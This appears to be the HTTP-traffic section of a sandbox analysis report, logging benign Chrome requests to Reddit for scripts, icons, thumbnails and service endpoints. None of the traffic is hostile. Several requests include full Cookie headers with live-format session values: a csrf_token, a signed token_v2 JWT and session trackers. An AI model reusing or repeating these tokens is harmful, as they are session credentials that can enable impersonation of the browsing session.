Source: global trafficHTTP traffic detected: GET /shreddit/en-US/list-style-community-recommendations-client-js-8648402c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/search-input-desktop-client-js-cb5b0267.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/header-action-item-user-drawer-client-js-f5ed6821.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_3oeyf/styles/communityIcon_a6wc6wasleke1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=dd83bae6c63d05f374cae1480faeb620c32524f6 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2vq0w/styles/communityIcon_6f0n71jeeund1.jpg?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=af8f886b0764af894227b5f1d0f8c947131eaad7 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2we4j/styles/communityIcon_k5n4c7i07t4d1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=91218d80e2b4db5ffbd035f2e09a1ead6917da49 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/hui-translation-button-client-js-d88f0399.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh13/styles/communityIcon_pldiwqvsyns91.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=e9043964d8308fece087e4f1d3a28c9434a3df10 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2cneq/styles/communityIcon_fy84mdgh75201.jpg?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=472bd1c805e4b619700ab09f74e694a5cd850341 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh3s/styles/communityIcon_3hssuqq28v4e1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=cd3b8e30512676345b9da6977662bbcea1b69211 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh22/styles/communityIcon_18jg89hnk9ae1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=fd029310c85c6c9e1af990ff8efac4e36fbdda01 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2vbgl/styles/communityIcon_47xlywkzsy7b1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=7c8a91844f3ee66935dade4a9c794b21077261a9 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2rfsw/styles/communityIcon_143o7qme59f71.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=824332071c5e9922d6d4ca5859fa89a20873f9ce HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /X3dq7BwWSNeUHhYVAwg9EWZnzdW0rDaEwG8X76Th8PI.jpg?auto=webp&s=41609c39ac55f81573d212eaf4cf408bb74a3170 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /harvard-university-sues-trump-administration-v0-CnN8ZfKcOn4wDwHWh1APYslDeCre3dW2lslBX2v2lPk.jpg?width=320&crop=smart&auto=webp&s=7ffccf74a52099eec5a9b04e930399271e4cd6cf HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /us-imposes-tariffs-up-to-3-521-on-southeast-asia-solar-v0-yfEQnukeFZZjzWGUB-QnxwYtVhfOGG6ne0-09Smf18U.jpg?width=320&crop=smart&auto=webp&s=d3b66a09afcac7f01a0cafb6db4ee0546e65eb8d HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /new-oscars-rule-if-you-dont-see-all-the-nominated-films-you-v0-cmKiQRTdAG60tRvxu0TW4Zn5IR8liBQippjgcfwwgPc.jpg?width=320&crop=smart&auto=webp&s=b91a6267ef92527b98a4fb7cc6ea3e8e2e1e7735 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /highlight-jalen-brunson-collides-with-ausar-thompson-and-v0-6CP-MBBLWl2aW-hy3UMydAhWSxamxScgB-3PkNsHTSQ.jpg?width=320&crop=smart&format=pjpg&auto=webp&s=9ae9843edd4b98eca028edb66bd587c978871393 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lh3XYdayDnfF474A_Ro9fBWUViOibSr4BoTpx0ETyvg.png HTTP/1.1Host: b.thumbs.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/header-large-client-js-8583a096.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/deprecated-content-client-js-d6b00feb.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/left-nav-resources-section-client-js-fb05eba9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/left-nav-topics-section-client-js-c3c87bfd.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/events HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344517370.Z0FBQUFBQm9COWdGeWpvMi1lOE9aRUxZY2hSNWVaQk5FUUxaYWpGdFFSUEtEUGlOd3IxZHQybUhEemZUYjRqQmVpc2ZHdk9MNGtKWkQydXVKRUYzaE9ZWl8xZlRqVDBqT1lRSUlkUlp1LTJTR3FBQllVYnZCUld3LVVESUEtT3JRSEhyUmpFdzZKSk4
Source: global trafficHTTP traffic detected: GET /svc/shreddit/update-recaptcha?k=cG9wdWxhcnxpbml0aWFsfGE4ZDU3MDUzLWJkZjctNGFiNS05MmQxLWEyMGE0ZGFjY2E3NA HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344517370.Z0FBQUFBQm9COWdGeWpvMi1lOE9aRUxZY2hSNWVaQk5FUUxaYWpGdFFSUEtEUGlOd3IxZHQybUhEemZUYjRqQmVpc2ZHdk9MNGtKWkQydXVKRUYzaE9ZWl8xZlRqVDBqT1lRSUlkUlp1LTJTR3FBQllVYnZCUld3LVVESUEtT3JRSEhyUmpFdzZKSk4
Source: global trafficHTTP traffic detected: GET /svc/shreddit/left-nav-recent-section HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344517445.Z0FBQUFBQm9COWdGZHFxalM3bHU5WTRLMDljZGYwZUgzQmhLTDRHZ0d2SHFhcjBIWnQyOWlHdkJMYzlnSzZhckI1T3k5QVNjMWF0c2RJVWt5QWpYNWUzWldQcG95WTJDMmFaN0Zqb0MtejVVQkQ5c0pSRGJzc2g1MlRQVGxpUFV1V1FrdC1JMGFmN2I
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/left-nav-client-js-957bb8c9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
